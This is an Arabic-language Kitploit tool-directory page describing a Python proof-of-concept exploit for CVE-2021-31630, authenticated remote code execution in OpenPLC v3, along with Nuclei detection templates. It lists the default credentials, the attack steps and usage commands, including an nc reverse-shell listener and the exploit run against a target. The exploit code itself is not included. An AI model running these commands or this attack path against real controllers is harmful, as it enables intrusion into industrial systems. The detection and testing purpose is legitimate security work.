Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OpenPLC-CVE-2021-31630-RCE — Python 3.13+ proof-of-concept exploit for CVE-2021-31630, enabling authenticated remote code execution on OpenPLC v3 via malicious hardware layer upload. Includes Nuclei detection templates for default credentials and vulnerability checks. | Kitploit
أدوات/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

Python 3.13+ proof-of-concept exploit for CVE-2021-31630, enabling authenticated remote code execution on OpenPLC v3 via malicious hardware layer upload. Includes Nuclei detection templates for default credentials and vulnerability checks.

عرض المستودع
325منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

OpenPLC v3 Authenticated RCE (CVE-2021-31630)

هذا هو استغلال (Proof-of-Concept) حديث ومتوافق مع بايثون 3.13+ لثغرة CVE-2021-31630، وهي ثغرة في OpenPLC v3 تسمح لمستخدم مُصادَق عليه برفع طبقة عتاد مخصصة تحتوي على كود خبيث، مما يؤدي إلى تنفيذ أوامر عن بُعد (RCE) على المضيف.

الاكتشاف الأصلي للثغرة والنشرة الأمنية من إعداد Fellipe Oliveira. تستخدم هذه الإعادة التنفيذ والتحديث مكتبة httpx، وأدوات سطر الأوامر، والسجلات (logging)، وتقنيات كشف أكثر أمانًا.

نظرة عامة على الاستغلال

  • الثغرة: CVE-2021-31630
  • المكوّن: خادم الويب الخاص بـ OpenPLC v3
  • الأثر: تنفيذ أوامر عن بُعد بعد المصادقة
  • بيانات الاعتماد الافتراضية: openplc:openplc

تسلسل الاستغلال

  1. تسجيل الدخول باستخدام بيانات اعتماد صالحة
  2. رفع كود C خبيث كطبقة عتاد مخصصة
  3. تشغيل عملية الترجمة (Compilation)
  4. تشغيل التنفيذ (اختياري)
  5. استقبال اتصال الصدفة العكسية

طريقة الاستخدام

  1. شغّل مستمعًا (Listener):
root@kitploit:~
nc -lvnp 9001
  1. شغّل الاستغلال:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

خيارات إضافية:

  • -u اسم المستخدم (الافتراضي: openplc)
  • -p كلمة المرور (الافتراضية: openplc)
  • -t مهلة الانتظار بالثواني (الافتراضية: 20)

الميزات

  • متوافق مع بايثون 3.13+
  • مبني باستخدام httpx
  • دعم السجلات (Logging) لإخراج نظيف
  • دوال معيارية (Modular) لإعادة استخدام أسهل
  • قوالب كشف Nuclei مضمّنة

قوالب كشف Nuclei

  1. فحص بيانات الاعتماد الافتراضية
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. فحص ثغرة تنفيذ الأوامر عن بُعد السلبي
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

يقوم القالب الثاني بتسجيل الدخول ومحاولة رفع حمولة غير ضارة + ترجمتها للتأكد من احتمالية وجود الثغرة — دون تشغيل تنفيذ فعلي للأكواد.

الملفات المرفقة

  • OpenPLC_CVE_2021_31630.py – استغلال متوافق مع بايثون 3.13+
  • nuclei-templates/openplc-default-login.yaml – كشف بيانات الاعتماد الافتراضية
  • nuclei-templates/openplc-authenticated-rce-check.yaml – كشف السلوك القابل للاستغلال بأمان

⚠️ القانون / الأخلاقيات

هذا الكود مخصص للأغراض التعليمية واختبارات الاختراق المصرح بها فقط. لا تستخدمه دون إذن صريح من مالك النظام.

تنزيل الأداة